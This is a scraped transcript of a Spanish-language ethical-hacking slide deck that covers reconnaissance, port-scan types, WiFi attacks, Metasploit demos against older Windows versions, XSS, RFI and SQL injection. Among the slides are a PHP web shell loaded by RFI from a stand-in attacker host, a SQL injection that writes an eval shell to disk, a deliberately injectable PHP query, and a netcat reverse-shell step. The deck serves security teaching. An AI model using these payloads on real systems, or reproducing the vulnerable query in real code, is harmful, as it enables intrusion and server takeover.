T cnicas avanzadas de penetraci n a sistemas
This presentation is the property of its rightful owner.
Sponsored Links
1 / 55

Técnicas avanzadas de penetración a sistemas PowerPoint PPT Presentation


  • 71 Views
  • Uploaded on
  • Presentation posted in: General

Técnicas avanzadas de penetración a sistemas. Ponente: Rafael Gómez Del Ángel Aka : [email protected] HACKING ETICO. Los hackers éticos son profesionales de la seguridad que aplican sus conocimientos de hacking con fines

Download Presentation

Técnicas avanzadas de penetración a sistemas

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript


T cnicas avanzadas de penetraci n a sistemas

Técnicas avanzadas de penetración a sistemas

Ponente: Rafael Gómez Del Ángel

Aka : [email protected]


Hacking etico

HACKING ETICO

Los hackers éticos son profesionales de la seguridad que

aplican sus conocimientos de hacking con fines

defensivos (y legales). Diremos hacker siempre, pero hay que fijarse en el contexto.


Que es un hacker

QUE ES UN HACKER

Experto en algún campo de la informática

Conocimientos profundos de diversas Plataformas (Windows, Unix, Linux, android).

Conocimientos de redes

Conocimientos de hardware y software.


Pasos previos al ataque

  • Reconocimiento

  • Pasivo

  • Activo

  • Rastreo (escaner)

  • Acceso

  • Niveles del Sistema

  • Redes

  • DOS

  • Mantener el acceso

  • Borrado de huellas

Pasos previos alATAQUE


Footprinting

FOOTPRINTING

Obtención de los perfiles de seguridad de una organización haciendo uso de una metodología (footprinting).

El resultado del footprinting es un perfil único de la organización en cuanto a sus redes (Internet / Intranet / Extranet /Wireless) y sistemas.


Footprinting1

FOOTPRINTING

1.- Obtener información inicial

• whois

• nslookup

2.- Localizar el rango de red

• Traceroute


Tipos de ataques

8.-Inyecciones SQL

9.-R.F.I

10.-XSS

11.-Inyeccion de comandos arbitrarios

12.-Hijacking

13.-Cookie poisoning

TIPOS DE ATAQUES

1.- Hacking WIFI

2.-DOS

3.-DDOS

4.-M.I.T

5.- Envenenamiento DNS

6.-Reverse Shell

7.-Port scaning


T cnicas avanzadas de penetraci n a sistemas

Hacking Wifi


T cnicas avanzadas de penetraci n a sistemas

Definiciones

·BSSID ·IVS

·SSID ·Mode monitor

·AP ·WEP

·STATION ·WPA

·DOS


T cnicas avanzadas de penetraci n a sistemas

Que Ataques analizaremos?

·Hacking WEP

·Fake AP

·Wifi DOS (A usuarios y sobre saturación de frecuencias)


T cnicas avanzadas de penetraci n a sistemas

Fake Ap

método De

Ataque y contra Ataque


T cnicas avanzadas de penetraci n a sistemas

DOS (Denial of service)

En redes Wifi

*Sobre saturacion de Frecuencias

*Des-autentificacion infinita de usuarios


T cnicas avanzadas de penetraci n a sistemas

Detección y Análisis

Wardriving


Escaneo de puertos

Escaneo de Puertos

El escaneo de puertos es el ataque primario y mas común utilizado en una auditoria ya sea legal o ilegal.

Nos permite :

Explorar

Identificar

Comprender


T cnicas

Tipo de escaneo

Otros

Medio abierto

Barridos

Técnicas

Abierto

Silencioso

UDP scan

TCP connect ()

TCP SYN

TCP FIN

TCP echo

FTP bounce scan

Reverse Ident

Zombie scan

ACK Scan

UDP echo

Null Scan

TCP ACK

TCP SYN

Xmas Scan

ICMP echo

SYN/ACK Scan

Fragmentación TCP


Tcp connect

TCP connect()

La mas común de cualquier software de escaneo de puertos

consiste en usar la llamada connect() de TCP

Intenta establecer conexión

Si conecta el puerto esta abierto

si no , el puerto esta cerrado

Si no contesta esta silencioso

Muy rápido e invasivo y llamativo en exceso.

* Miles de conexiones

*Logs


Comportamiento tcp connect

ComportamientoTCP connect()

Hacker-------[SYN]------>[0] Puerto TCP Victima OPEN

Hacker<-------[SYN/ACK]-------[0] Puerto TCP Victima OPEN

Hacker-------[ACK]------->[0] Puerto TCP Victima OPEN

Hacker-------[SYN]------->[X] Puerto TCP Victima CLOSED

Hacker<-----[RST]-------[X] Puerto TCP Victima CLOSED

Hacker------[SYN]-------[*] Puerto TCP Victima SILENT


Tcp syn

TCP SYN

Técnica conocida como Half-open scan, escaneo medio abierto por excelencia

se envía un paquete SYN fingiendo establecer una conexion y se espera la respuesta del Host, si llega un paquete SYN/ACK

significa que esta abierto y no devolvemos la contestación ACK, devolvemos RST , esto para evitar que se complete el inicio

de conexión y así burlar el registro del sistema como intento de conexión

*Discreto

*Excelentes resultados


Comportamiento tcp syn

ComportamientoTCP SYN

Hacker ---[SYN]---> [O] P. TCP abierto en la Victima

Hacker <---[SYN/ACK]--- [O] P. TCP abierto en la Victima

Hacker ---[RST]---> [O] P. TCP abierto en la Victima

Hacker ---[SYN]---> [X] Puerto TCP cerrado en la Victima

Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[SYN]---> [~] Puerto TCP silencioso en la Victima


Ack scan

ACK scan

Destinado a identificar aquellos puertos que están en estado silencioso de forma precisa cuando un puerto esta en este estado o no.

Envía paquetes ACK con números de secuencia y confirmación aleatorios.

si el puerto esta abierto, responderá con un paquete RST, pues no identificara la conexión como suya

si el puerto esta cerrado responderá RST pero si no responde es que esta filtrado.

* Apoyo de un escaneo anterior

*Variable del ping si responde RST

esta vivo si no es in alcanzable.

*Identificar firewall bloqueando SYN.


Comportamiento ack scan

ComportamientoACK scan

Hacker ---[ACK]---> [O] Puerto TCP abierto en la Victima

Hacker <---[RST]--- [O] Puerto TCP abierto en la Victima

Hacker ---[ACK]---> [X] Puerto TCP cerrado en la Victima

Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ACK]---> [~] Puerto TCP silencioso en la Victima


Null scan

Null scan

Similar al FIN, funciona del mismo modo, enviando paquetes malformados, pero en este caso con

los flags desactivados, si el puerto esta cerrado nos responderá con RST y En caso de no recibir nada el puerto esta abierto o silencioso.

Ciertos firewalls vigilan los paquetes de finalización aquí hace lo que FIN no.


Comportamiento null scan

ComportamientoNull scan

Hacker ---[ ]---> [O] Puerto TCP abierto en la Victima

local ---[ ]---> [X] Puerto TCP cerrado en la Victima

Hacker <---[RST]--- [X] Puerto TCP cerrado en la Victima

Hacker ---[ ]---> [~] Puerto TCP silencioso en la Victima


La raz n

La razón


T cnicas avanzadas de penetraci n a sistemas

POC

Analizar 2 tipos de escaneo con la intención de evadir un firewall y obtener información acerca de los puertos abiertos.


Ataques mit

DNS cache poisoning

ARP Poisoning

Phishing

Ataques MIT


Explotacion

EXPLOTACION


Esc ner de vulnerabilidades

Escáner de vulnerabilidades


Esc ner de vulnerabilidades1

Escáner de vulnerabilidades


Explotacion1

EXPLOTACION


Metasploit windows server 2003

MetasploitWindows Server 2003


Penetraci n windows server 2003 prueba de concepto

Puerto 445

ms08067

Crear usuario

Habilitar Escritorio Remoto

Cambiar la contraseña del Administrador

PenetraciónWindows Server 2003prueba de concepto

OBJETIVO

Mostrar el ataque de penetración a Windows server 2003 en un ambiente controlado.


Metasploit windows server 2008 r2

MetasploitWindows Server 2008 R2


Metasploit windows server 2008 r21

MetasploitWindows Server 2008 R2

  • Numero de vulnerabilidad : ms09050

  • Encontrar el servidor verificando versión de smb

  • Explotar la vulnerabilidad

  • Denegación de servicios.

OBJETIVO

Mostrar el ataque de Denegación de servicios a Windows server 2008 en un ambiente controlado.


Metasploit windows xp sp3

MetasploitWindows XP SP3


Metasploit penetraci n a windows xp sp3 prueba de concepto

MetasploitPenetración a Windows XP SP3 Prueba de concepto

Encontrar la victima verificando versión de SMB

Lograr la obtención de una reverse shell

Habilitar el uso de escritorio remoto

Inyectar la conexión a escritorio remoto

OBJETIVO

Mostrar el ataque de penetración a windows XP sp3 en un ambiente controlado.


Metasploit windows 7

MetasploitWindows 7


Metasploit windows 7 penetraci n prueba de concepto

MetasploitWindows 7 PenetraciónPrueba de concepto

Usar INGENIERIA SOCIAL

Copiar netcat a la victima y crear puerta trasera creando REVERSE SHELL

Vulnerar navegador web.

UPLOAD MI PATH C:\DESTINO\\Downloads

OBJETIVO

Mostrar el ataque de penetración a windows 7 en un ambiente controlado.


Ataques web

Ataques WEB


Ataques xss

Analicemos la vulnerabilidad de xss

Es una vulnerabilidad de grado medio alto ya que con estos ataques será posible el re alizar el hijacking que es el robo de identidad mediante las cookies del navegador

Ataques XSS


Ataques xss1

Ataques XSS


Ataques xss2

Ataques XSS


Ataques xss3

Ataques XSS


Ataques rfi remote file inclusion

vulnerabilidad que afecta únicamente a paginas dinámicas programadas en PHP, consiste en enlazar archivos ubicados en un servidor remoto.

RFI se aprovecha del uso irresponsable de las

funciones include y requiere, las cuales, debido al limitado conocimiento del programador y

las pocas o nulas validaciones que realiza antes de incluir una variable recibida por

parametro de URL, pueden ser aprovechadas por usuarios maliciosos para incluir scripts

programados para explotar dicha vulnerabilidad.

Ataques RFIRemotefileinclusion


Ataques rfi remote file inclusion1

http://www.victima.com/index.php?nav=pagina1php

http://www.victimacom/index.php?nav=pagina2.php

Ataques RFIRemotefileinclusion

<?php

printsystem($_GET['command']);

?>

http://www.victima.com/index.php?nav=http://atacante.com/shell.txt&command=ls


Inyeccion sql

Inyeccion SQL

union all select "<?phpeval($_GET['exec']); ?>",2,3,4into outfile"/var/www/html/exec.php"


Analicemos este c digo

<?php$link = mysql_connect('127.0.0.1','root', 'pass');mysql_select_db('ejemplo', $link);$sql = mysql_query('select * from ejemplo where id='.$_GET['id'], $link);if(mysql_errno($link)){ echo mysql_error($link);exit;}while($row = mysql_fetch_assoc($sql)){ echo $row['id']."".$row['titulo']."".$row['contenido']."".$row['parent'];}?>

Analicemos este código


Busqueda de tablas

Busqueda de tablas.


Prueba de concepto

Prueba de concepto

OBJETIVO

Mostrar el ataque de inyección SQL y la técnica de intrusión de SHELL en un ambiente controlado.


El resultado llegando a una conclusi n

EL RESULTADOllegando a una conclusión


El resultado

El resultado.


Gracias

GRACIAS

Ponente: Rafael Gómez Del Ángel

Aka : [email protected]


  • Login